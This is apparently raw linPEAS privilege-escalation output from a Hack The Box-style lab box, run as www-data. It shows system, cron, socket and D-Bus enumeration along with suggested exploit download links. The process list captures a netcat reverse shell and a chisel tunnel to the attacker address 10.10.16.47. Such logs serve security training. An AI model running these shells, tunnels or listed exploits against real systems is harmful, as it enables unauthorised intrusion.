bash /tmp/linpeas.sh -M -e -L -t ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄ ▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀ ▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀ ▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀ /---------------------------------------------------------------------------------\ | Do you like PEASS? | |---------------------------------------------------------------------------------| | Get the latest version : https://github.com/sponsors/carlospolop | | Follow on Twitter : @carlospolopm | | Respect on HTB : SirBroccoli | |---------------------------------------------------------------------------------| | Thank you! | \---------------------------------------------------------------------------------/ linpeas-ng by carlospolop ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission. Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist LEGEND: RED/YELLOW: 95% a PE vector RED: You should take a look to it LightCyan: Users with console Blue: Users without console & mounted devs Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) LightMagenta: Your username Starting linpeas. Caching Writable Folders... ╔═══════════════════╗ ═══════════════════════════════╣ Basic information ╠═══════════════════════════════ ╚═══════════════════╝ OS: Linux version 4.15.0-202-generic (buildd@lcy02-amd64-115) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #213-Ubuntu SMP Thu Jan 5 19:19:12 UTC 2023 User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data) Hostname: interface Writable folder: /dev/shm [+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h) [+] /bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h) [+] /bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h) Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . uniq: write error: Broken pipe DONE ╔════════════════════╗ ══════════════════════════════╣ System Information ╠══════════════════════════════ ╚════════════════════╝ ╔══════════╣ Operative system ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits Linux version 4.15.0-202-generic (buildd@lcy02-amd64-115) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #213-Ubuntu SMP Thu Jan 5 19:19:12 UTC 2023 Distributor ID: Ubuntu Description: Ubuntu 18.04.6 LTS Release: 18.04 Codename: bionic ╔══════════╣ Sudo version ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version Sudo version 1.8.21p2 ╔══════════╣ CVEs Check Potentially Vulnerable to CVE-2022-2588 ╔══════════╣ PATH ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/system/bin:/system/sbin:/system/xbin New path exported: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/system/bin:/system/sbin:/system/xbin ╔══════════╣ Date & uptime Sun Feb 12 11:11:57 UTC 2023 11:11:57 up 2:14, 0 users, load average: 0.16, 0.22, 0.30 ╔══════════╣ System stats Filesystem Size Used Avail Use% Mounted on udev 952M 0 952M 0% /dev tmpfs 197M 9.8M 187M 5% /run /dev/mapper/ubuntu--vg-ubuntu--lv 3.5G 3.1G 340M 91% / tmpfs 984M 4.0K 984M 1% /dev/shm tmpfs 5.0M 0 5.0M 0% /run/lock tmpfs 984M 0 984M 0% /sys/fs/cgroup /dev/sda2 219M 149M 53M 74% /boot total used free shared buff/cache available Mem: 2014888 269756 424972 14864 1320160 1542560 Swap: 1048572 268 1048304 ╔══════════╣ CPU info Architecture: x86_64 CPU op-mode(s): 32-bit, 64-bit Byte Order: Little Endian CPU(s): 2 On-line CPU(s) list: 0,1 Thread(s) per core: 1 Core(s) per socket: 1 Socket(s): 2 NUMA node(s): 1 Vendor ID: GenuineIntel CPU family: 6 Model: 85 Model name: Intel(R) Xeon(R) Gold 5218 CPU @ 2.30GHz Stepping: 7 CPU MHz: 2294.609 BogoMIPS: 4589.21 Hypervisor vendor: VMware Virtualization type: full L1d cache: 32K L1i cache: 32K L2 cache: 1024K L3 cache: 22528K NUMA node0 CPU(s): 0,1 Flags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon nopl xtopology tsc_reliable nonstop_tsc cpuid pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand hypervisor lahf_lm abm 3dnowprefetch cpuid_fault invpcid_single ssbd ibrs ibpb stibp ibrs_enhanced fsgsbase tsc_adjust bmi1 avx2 smep bmi2 invpcid avx512f avx512dq rdseed adx smap clflushopt clwb avx512cd avx512bw avx512vl xsaveopt xsavec xsaves arat pku ospke md_clear flush_l1d arch_capabilities ╔══════════╣ Any sd*/disk* disk in /dev? (limit 20) disk sda sda1 sda2 sda3 ╔══════════╣ Unmounted file-system? ╚ Check if you can mount umounted devices /dev/disk/by-id/dm-uuid-LVM-i3pCcRu1s0TOrvFh0JfLWwVAmyM66tqgFue8hxoPZWT54KAfm6w6w9SmET94QCTF / ext4 defaults 0 0 /dev/disk/by-uuid/9a15dfee-5052-4de7-86fb-b3ec2b2069ec /boot ext4 defaults 0 0 /dev/mapper/ubuntu--vg-swap none swap sw 0 0 ╔══════════╣ Environment ╚ Any private information inside environment variables? LANG=C USER=www-data PWD=/var/www/.gnupg HOME=/var/www HISTFILE=/dev/null SHLVL=1 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/system/bin:/system/sbin:/system/xbin HISTSIZE=0 HISTFILESIZE=0 _=/usr/bin/env ╔══════════╣ Searching Signature verification failed in dmesg ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed dmesg Not Found ╔══════════╣ Executing Linux Exploit Suggester ╚ https://github.com/mzet-/linux-exploit-suggester cat: write error: Broken pipe cat: write error: Broken pipe cat: write error: Broken pipe cat: write error: Broken pipe cat: write error: Broken pipe [+] [CVE-2021-4034] PwnKit Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt Exposure: probable Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main [+] [CVE-2021-3156] sudo Baron Samedit Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt Exposure: probable Tags: mint=19,[ ubuntu=18|20 ], debian=10 Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main [+] [CVE-2021-3156] sudo Baron Samedit 2 Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt Exposure: probable Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10 Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main [+] [CVE-2018-18955] subuid_shell Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1712 Exposure: probable Tags: [ ubuntu=18.04 ]{kernel:4.15.0-20-generic},fedora=28{kernel:4.16.3-301.fc28} Download URL: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45886.zip Comments: CONFIG_USER_NS needs to be enabled [+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET) Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/ https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/ Exposure: less probable Tags: ubuntu=(22.04){kernel:5.15.0-27-generic} Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN) [+] [CVE-2022-2586] nft_object UAF Details: https://www.openwall.com/lists/oss-security/2022/08/29/5 Exposure: less probable Tags: ubuntu=(20.04){kernel:5.12.13} Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1 Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN) [+] [CVE-2021-22555] Netfilter heap out-of-bounds write Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html Exposure: less probable Tags: ubuntu=20.04{kernel:5.8.0-*} Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c Comments: ip_tables kernel module must be loaded [+] [CVE-2019-18634] sudo pwfeedback Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/ Exposure: less probable Tags: mint=19 Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c Comments: sudo configuration requires pwfeedback to be enabled. [+] [CVE-2019-15666] XFRM_UAF Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc Exposure: less probable Download URL: Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled [+] [CVE-2017-5618] setuid screen v4.5.0 LPE Details: https://seclists.org/oss-sec/2017/q1/184 Exposure: less probable Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154 [+] [CVE-2017-0358] ntfs-3g-modprobe Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1072 Exposure: less probable Tags: ubuntu=16.04{ntfs-3g:2015.3.14AR.1-1build1},debian=7.0{ntfs-3g:2012.1.15AR.5-2.1+deb7u2},debian=8.0{ntfs-3g:2014.2.15AR.2-1+deb8u2} Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41356.zip Comments: Distros use own versioning scheme. Manual verification needed. Linux headers must be installed. System must have at least two CPU cores. ╔══════════╣ Executing Linux Exploit Suggester 2 ╚ https://github.com/jondonas/linux-exploit-suggester-2 ╔══════════╣ Protections ═╣ AppArmor enabled? .............. You do not have enough privilege to read the profile set. apparmor module is loaded. ═╣ grsecurity present? ............ grsecurity Not Found ═╣ PaX bins present? .............. PaX Not Found ═╣ Execshield enabled? ............ Execshield Not Found ═╣ SELinux enabled? ............... sestatus Not Found ═╣ Seccomp enabled? ............... disabled ═╣ AppArmor profile? .............. unconfined ═╣ User namespace? ................ enabled ═╣ Cgroup2 enabled? ............... enabled ═╣ Is ASLR enabled? ............... Yes ═╣ Printer? ....................... No ═╣ Is this a virtual machine? ..... Yes (vmware) ╔═══════════╗ ═══════════════════════════════════╣ Container ╠═══════════════════════════════════ ╚═══════════╝ ╔══════════╣ Container related tools present /usr/bin/lxc ╔══════════╣ Am I Containered? ╔══════════╣ Container details ═╣ Is this a container? ........... No ═╣ Any running containers? ........ No ╔═══════╗ ═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════ ╚═══════╝ ═╣ Google Cloud Platform? ............... No ═╣ AWS ECS? ............................. No ═╣ AWS EC2? ............................. No ═╣ AWS Lambda? .......................... No ╔════════════════════════════════════════════════╗ ════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════ ╚════════════════════════════════════════════════╝ ╔══════════╣ Cleaned processes ╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes root 1 0.0 0.4 159652 8792 ? Ss 08:57 0:03 /sbin/init maybe-ubiquity root 524 0.2 0.8 95016 16212 ? S&1|nc 10.10.16.47 4444 >/tmp/f www-data 3169 0.0 0.0 4680 816 ? S 10:41 0:00 | _ cat /tmp/f www-data 3170 0.0 0.0 4636 1676 ? S 10:41 0:00 | _ sh -i www-data 3189 0.1 0.2 9760 4320 ? Sl 10:42 0:03 | | _ /tmp/NJwcm www-data 14831 0.0 0.0 4636 828 ? S 10:47 0:00 | | _ /bin/sh www-data 14832 0.0 0.2 20344 5148 ? S 10:47 0:00 | | | _ bash /tmp/linpeas.sh -M -e -L -t www-data 39396 0.0 0.2 20344 4084 ? S 11:00 0:00 | | | | _ bash /tmp/linpeas.sh -M -e -L -t www-data 40732 0.0 0.2 20344 4204 ? S 11:00 0:00 | | | | _ bash /tmp/linpeas.sh -M -e -L -t www-data 40734 0.0 0.0 11468 1016 ? S 11:00 0:00 | | | | _ grep -A 256 Ports going to be scanned www-data 40735 0.0 0.0 11468 1088 ? S 11:00 0:00 | | | | _ grep -v Ports going to be scanned www-data 14833 0.0 0.0 4544 828 ? S 10:47 0:00 | | | _ tee /tmp/peas.log www-data 22118 0.0 0.0 4636 820 ? S 10:51 0:00 | | _ /bin/sh www-data 22141 0.0 0.4 718304 8292 ? Sl 10:52 0:00 | | | _ ./chisel client 10.10.16.47:8000 R:3000:127.0.0.1:3000 www-data 44089 0.0 0.0 4636 880 ? S 11:11 0:00 | | _ /bin/sh www-data 44091 0.7 0.2 20344 5180 ? S 11:11 0:00 | | _ bash /tmp/linpeas.sh -M -e -L -t www-data 47476 0.0 0.1 20344 3900 ? S 11:12 0:00 | | _ bash /tmp/linpeas.sh -M -e -L -t www-data 47479 0.0 0.1 37020 3520 ? R 11:12 0:00 | | | _ ps fauxwww www-data 47480 0.0 0.1 20344 2332 ? S 11:12 0:00 | | _ bash /tmp/linpeas.sh -M -e -L -t www-data 3171 0.0 0.1 15720 2108 ? S 10:41 0:00 | _ nc 10.10.16.47 4444 www-data 1387 0.0 1.0 325212 20564 ? S 08:57 0:00 _ php-fpm: pool www message+ 1292 0.0 0.2 50132 4620 ? Ss 08:57 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only └─(Caps) 0x0000000020000000=cap_audit_write root 1348 0.1 0.1 457232 2036 ? Ssl 08:57 0:08 /usr/bin/lxcfs /var/lib/lxcfs/ syslog 1382 0.0 0.2 263048 4388 ? Ssl 08:57 0:00 /usr/sbin/rsyslogd -n root 1399 0.0 0.8 169524 17548 ? Ssl 08:57 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers root 1402 0.0 0.2 62012 5548 ? Ss 08:57 0:00 /lib/systemd/systemd-logind root 1477 0.0 0.2 72304 5760 ? Ss 08:57 0:00 /usr/sbin/sshd -D root 1478 0.0 0.3 288884 6584 ? Ssl 08:57 0:00 /usr/lib/policykit-1/polkitd --no-debug root 1498 0.0 0.0 14896 1924 tty1 Ss+ 08:57 0:00 /sbin/agetty -o -p -- u --noclear tty1 linux root 1625 0.0 0.0 142884 1584 ? Ss 08:57 0:00 nginx: master process /usr/sbin/nginx -g daemon[0m on; master_process on; www-data 1627 0.0 0.3 145180 6296 ? S 08:57 0:00 _ nginx: worker process www-data 1628 0.0 0.3 145180 7248 ? S 08:57 0:00 _ nginx: worker process www-data 3196 0.0 0.2 20340 5056 ? S 10:43 0:00 bash /tmp/linpeas.sh -M -e -L -t www-data 10388 0.0 0.1 20340 3900 ? S 10:45 0:00 _ bash /tmp/linpeas.sh -M -e -L -t www-data 11709 0.0 0.2 20340 4128 ? S 10:45 0:00 _ bash /tmp/linpeas.sh -M -e -L -t www-data 11711 0.0 0.0 11468 1048 ? S 10:45 0:00 _ grep -A 256 Ports going to be scanned www-data 11712 0.0 0.0 11468 980 ? S 10:45 0:00 _ grep -v Ports going to be scanned root 9709 0.0 0.0 4560 756 ? Ss 10:44 0:00 /usr/sbin/acpid uuidd 9948 0.0 0.0 26856 1456 ? Ss 10:44 0:00 /usr/sbin/uuidd --socket-activation www-data 22149 0.1 0.2 21276 6000 ? S 10:53 0:01 bash linpeas.sh www-data 39291 0.0 0.0 11076 1064 ? S 10:54 0:00 _ aureport --tty www-data 39292 0.0 0.0 11468 1032 ? S 10:54 0:00 _ grep -E su |sudo www-data 29484 0.0 0.0 90388 716 ? Ss 10:54 0:00 gpg-agent --homedir /var/www/.gnupg --use-standard-socket --daemon ╔══════════╣ Binary processes permissions (non 'root root' and not belonging to current user) ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes ╔══════════╣ Files opened by processes belonging to other users ╚ This is usually empty because of the lack of privileges to read other user processes information COMMAND PID TID USER FD TYPE DEVICE SIZE/OFF NODE NAME ╔══════════╣ Processes with credentials in memory (root req) ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory gdm-password Not Found gnome-keyring-daemon Not Found lightdm Not Found vsftpd Not Found apache2 Not Found sshd Not Found ╔══════════╣ Cron jobs ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs /usr/bin/crontab incrontab Not Found -rw-r--r-- 1 root root 722 Nov 16 2017 /etc/crontab /etc/cron.d: total 24 drwxr-xr-x 2 root root 4096 Jan 16 09:49 . drwxr-xr-x 99 root root 4096 Feb 6 10:02 .. -rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder -rw-r--r-- 1 root root 589 Jan 14 2020 mdadm -rw-r--r-- 1 root root 712 Jan 11 2022 php -rw-r--r-- 1 root root 191 Aug 6 2020 popularity-contest /etc/cron.daily: total 60 drwxr-xr-x 2 root root 4096 Feb 6 10:02 . drwxr-xr-x 99 root root 4096 Feb 6 10:02 .. -rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder -rwxr-xr-x 1 root root 539 Feb 23 2021 apache2 -rwxr-xr-x 1 root root 376 Nov 11 2019 apport -rwxr-xr-x 1 root root 1478 Apr 20 2018 apt-compat -rwxr-xr-x 1 root root 355 Dec 29 2017 bsdmainutils -rwxr-xr-x 1 root root 1176 Nov 2 2017 dpkg -rwxr-xr-x 1 root root 372 Aug 21 2017 logrotate -rwxr-xr-x 1 root root 1065 Apr 7 2018 man-db -rwxr-xr-x 1 root root 539 Jan 14 2020 mdadm -rwxr-xr-x 1 root root 538 Mar 1 2018 mlocate -rwxr-xr-x 1 root root 249 Jan 25 2018 passwd -rwxr-xr-x 1 root root 3477 Feb 21 2018 popularity-contest -rwxr-xr-x 1 root root 214 Nov 12 2018 update-notifier-common /etc/cron.hourly: total 12 drwxr-xr-x 2 root root 4096 Jan 16 09:49 . drwxr-xr-x 99 root root 4096 Feb 6 10:02 .. -rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder /etc/cron.monthly: total 12 drwxr-xr-x 2 root root 4096 Jan 16 09:49 . drwxr-xr-x 99 root root 4096 Feb 6 10:02 .. -rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder /etc/cron.weekly: total 20 drwxr-xr-x 2 root root 4096 Feb 6 10:01 . drwxr-xr-x 99 root root 4096 Feb 6 10:02 .. -rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder -rwxr-xr-x 1 root root 723 Apr 7 2018 man-db -rwxr-xr-x 1 root root 403 Aug 23 2021 update-notifier-common SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) ╔══════════╣ Services ╚ Search for outdated versions [ + ] acpid [ + ] apache-htcacheclean [ - ] apache2 [ + ] apparmor [ + ] apport [ + ] atd [ + ] auditd [ - ] console-setup.sh [ + ] cron [ - ] cryptdisks [ - ] cryptdisks-early [ + ] dbus [ + ] ebtables [ + ] grub-common [ - ] hwclock.sh [ + ] irqbalance [ + ] iscsid [ - ] keyboard-setup.sh [ + ] kmod [ - ] lvm2 [ + ] lvm2-lvmetad [ + ] lvm2-lvmpolld [ + ] lxcfs [ - ] lxd [ - ] mdadm [ - ] mdadm-waitidle [ + ] networking [ + ] nginx [ - ] open-iscsi [ + ] open-vm-tools [ + ] php7.4-fpm [ - ] plymouth [ - ] plymouth-log [ + ] procps [ - ] rsync [ + ] rsyslog [ - ] screen-cleanup [ + ] ssh [ + ] udev [ + ] uuidd ╔══════════╣ Systemd PATH ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin ╔══════════╣ Analyzing .service files ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services /etc/systemd/system/multi-user.target.wants/networking.service is executing some relative path /etc/systemd/system/network-online.target.wants/networking.service is executing some relative path You can't write on systemd PATH ╔══════════╣ System timers ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers NEXT LEFT LAST PASSED UNIT ACTIVATES Sun 2023-02-12 11:39:00 UTC 26min left Sun 2023-02-12 11:09:02 UTC 3min 27s ago phpsessionclean.timer phpsessionclean.service Sun 2023-02-12 11:53:35 UTC 41min left Sun 2023-02-12 08:57:52 UTC 2h 14min ago motd-news.timer motd-news.service Sun 2023-02-12 15:22:31 UTC 4h 10min left Sun 2023-02-12 09:17:20 UTC 1h 55min ago ua-timer.timer ua-timer.service Sun 2023-02-12 18:24:06 UTC 7h left Sun 2023-02-12 08:57:52 UTC 2h 14min ago apt-daily.timer apt-daily.service Mon 2023-02-13 00:00:00 UTC 12h left Mon 2023-02-06 09:52:53 UTC 6 days ago fstrim.timer fstrim.service Mon 2023-02-13 06:56:31 UTC 19h left Sun 2023-02-12 08:57:52 UTC 2h 14min ago apt-daily-upgrade.timer apt-daily-upgrade.service Mon 2023-02-13 09:12:42 UTC 22h left Sun 2023-02-12 09:12:42 UTC 1h 59min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service n/a n/a n/a n/a snapd.snap-repair.timer snapd.snap-repair.service n/a n/a n/a n/a ureadahead-stop.timer ureadahead-stop.service ╔══════════╣ Analyzing .timer files ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers ╔══════════╣ Analyzing .socket files ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets /etc/systemd/system/cloud-init.target.wants/cloud-init-hotplugd.socket is calling this writable listener: /run/cloud-init/hook-hotplug-cmd /etc/systemd/system/sockets.target.wants/uuidd.socket is calling this writable listener: /run/uuidd/request /lib/systemd/system/cloud-init-hotplugd.socket is calling this writable listener: /run/cloud-init/hook-hotplug-cmd /lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket /lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket /lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log /lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout /lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket /lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog /lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log /lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout /lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket /lib/systemd/system/uuidd.socket is calling this writable listener: /run/uuidd/request ╔══════════╣ Unix Sockets Listening ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets /run/acpid.socket └─(Read Write - Can Connect) /run/dbus/system_bus_socket └─(Read Write - Can Connect) /run/lvm/lvmetad.socket └─( - Cannot Connect) /run/lvm/lvmpolld.socket └─( - Cannot Connect) /run/php/php7.4-fpm.sock └─(Read Write - Can Connect) /run/snapd-snap.socket └─(Read Write - Can Connect) /run/snapd.socket └─(Read Write - Can Connect) /run/systemd/journal/dev-log └─(Read Write - Can Connect) /run/systemd/journal/socket └─(Read Write - Can Connect) /run/systemd/journal/stdout └─(Read Write - Can Connect) /run/systemd/journal/syslog └─(Read Write - Can Connect) /run/systemd/notify └─(Read Write - Can Connect) /run/systemd/private └─(Read Write - Can Connect) /run/udev/control └─( - Cannot Connect) /run/uuidd/request └─(Read Write - Can Connect) /run/vmware/guestServicePipe └─(Read Write - Can Connect) /var/lib/lxd/unix.socket └─( - Cannot Connect) /var/run/dbus/system_bus_socket └─(Read Write - Can Connect) /var/run/vmware/guestServicePipe └─(Read Write - Can Connect) /var/www/.gnupg/S.gpg-agent └─(Read Write - Can Connect) /var/www/.gnupg/S.gpg-agent.browser └─(Read Write - Can Connect) /var/www/.gnupg/S.gpg-agent.extra └─(Read Write - Can Connect) /var/www/.gnupg/S.gpg-agent.ssh └─(Read Write - Can Connect) ╔══════════╣ D-Bus config files ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus Possible weak user policy found on /etc/dbus-1/system.d/dnsmasq.conf ( ) Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.thermald.conf ( ) ╔══════════╣ D-Bus Service Objects list ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus NAME PID PROCESS USER CONNECTION UNIT SESSION DESCRIPTION :1.0 1059 systemd-network systemd-network :1.0 systemd-networkd.service - - :1.1 1139 systemd-resolve systemd-resolve :1.1 systemd-resolved.service - - :1.2 1 systemd root :1.2 init.scope - - :1.3 1289 accounts-daemon[0m root :1.3 accounts-daemon.service - - :1.433 51087 snapd root :1.433 snapd.service - - :1.434 51158 systemd-timedat root :1.434 systemd-timedated.service - - :1.436 51415 busctl www-data :1.436 php7.4-fpm.service - - :1.5 1402 systemd-logind root :1.5 systemd-logind.service - - :1.6 1478 polkitd root :1.6 polkit.service - - :1.7 1399 networkd-dispat root :1.7 networkd-dispatcher.se…ce - - com.ubuntu.LanguageSelector - - - (activatable) - - com.ubuntu.SoftwareProperties - - - (activatable) - - org.freedesktop.Accounts 1289 accounts-daemon[0m root :1.3 accounts-daemon.service - - org.freedesktop.DBus 1 systemd root - init.scope - - org.freedesktop.PolicyKit1 1478 polkitd root :1.6 polkit.service - - org.freedesktop.hostname1 - - - (activatable) - - org.freedesktop.locale1 - - - (activatable) - - org.freedesktop.login1 1402 systemd-logind root :1.5 systemd-logind.service - - org.freedesktop.network1 1059 systemd-network systemd-network :1.0 systemd-networkd.service - - org.freedesktop.resolve1 1139 systemd-resolve systemd-resolve :1.1 systemd-resolved.service - - org.freedesktop.systemd1 1 systemd root :1.2 init.scope - - org.freedesktop.thermald - - - (activatable) - - org.freedesktop.timedate1 51158 systemd-timedat root :1.434 systemd-timedated.service - - ╔═════════════════════╗ ══════════════════════════════╣ Network Information ╠══════════════════════════════ ╚═════════════════════╝ ╔══════════╣ Hostname, hosts and DNS interface 127.0.0.1 localhost interface interface.htb 127.0.1.1 interface ::1 ip6-localhost ip6-loopback fe00::0 ip6-localnet ff00::0 ip6-mcastprefix ff02::1 ip6-allnodes ff02::2 ip6-allrouters nameserver 127.0.0.53 options edns0 ╔══════════╣ Content of /etc/inetd.conf & /etc/xinetd.conf /etc/inetd.conf Not Found ╔══════════╣ Interfaces # symbolic names for networks, 